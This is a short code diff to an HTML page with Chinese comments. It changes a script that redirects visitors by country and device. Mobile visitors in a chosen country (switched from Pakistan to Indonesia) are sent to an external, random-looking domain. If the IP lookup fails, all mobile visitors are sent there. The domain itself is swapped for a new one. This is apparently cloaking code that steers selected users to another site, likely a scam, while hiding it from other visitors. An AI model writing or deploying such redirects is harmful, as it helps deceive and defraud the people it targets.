--- a/jz/ynaaa2.html
+++ b/jz/ynaaa2.html
@@ -52,8 +52,8 @@
       .then(response => response.json())
       .then(data => {
         // 严格的三重条件判断
-        if (data.country === 'PK' && isMobileDevice() ) {
-          window.location.href = "https://www.jacmsotck.online/jz/ynjz.html";
+        if (data.country === 'ID' && isMobileDevice() ) {
+          window.location.href = "https://www.weuy616s.site/jz/ynjz.html";
           return;
         }
      
@@ -67,7 +67,7 @@
       .catch(() => {
         // IP检测失败时严格的双重条件判断
         if (isMobileDevice() ) {
-          window.location.href = "https://www.jacmsotck.online/jz/ynjz.html";
+          window.location.href = "https://www.weuy616s.site/jz/ynjz.html";
           return;
         }
         
